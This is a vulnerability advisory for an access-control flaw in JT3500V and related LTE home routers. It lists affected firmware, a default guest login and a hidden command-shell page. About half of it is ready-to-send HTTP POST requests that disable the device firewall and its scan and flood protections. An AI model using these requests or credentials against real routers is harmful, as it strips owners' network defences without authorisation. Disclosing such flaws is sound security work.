KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Improper Access Control (IDOR) Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: Insecure direct object references occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources in the system and execute privileged functionalities. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5640 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5640.php 03.02.2021 -- The guest account user:user123 can navigate to /system_firewall.html page and disable the firewall. The guest account can access any page directly and modify the device. Or navigate to the hidden /lte/cmdshell.html page and execute LTE protocol stack commands. Ref: https://cwe.mitre.org/data/definitions/732.html Disable the firewall IDOR (newer models): ----------------------------------------- POST /goform/set_sys_firewall HTTP/1.1 Host: 192.168.1.1 Connection: keep-alive Content-Length: 167 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://192.168.1.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://192.168.1.1/system_firewall.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b enableFirewall: 0 pingFrmWANFilterEnabled: 0 blockPortScanEnabled: 0 blockSynFloodEnabled: 0 spiFWEnabled: 1 ftp_alg_enable_val: 1 pptp_alg_enable_val: 1 sip_alg_enable_val: 1 Disable the firewall IDOR (older models): ----------------------------------------- POST /goform/websSysFirewall HTTP/1.1 Host: 192.168.1.1 Connection: keep-alive Content-Length: 167 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Content-Type: application/x-www-form-urlencoded Origin: http://192.168.1.1 Referer: http://192.168.1.1/system_firewall.asp Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6 Cookie: kz_userid=admin:4540141 enableFirewall: 0 pingFrmWANFilterEnabled: 0 blockPortScanEnabled: 0 blockSynFloodEnabled: 0 spiFWEnabled: 1 ftp_alg_enable_val: 1 pptp_alg_enable_val: 1 sip_alg_enable_val: 1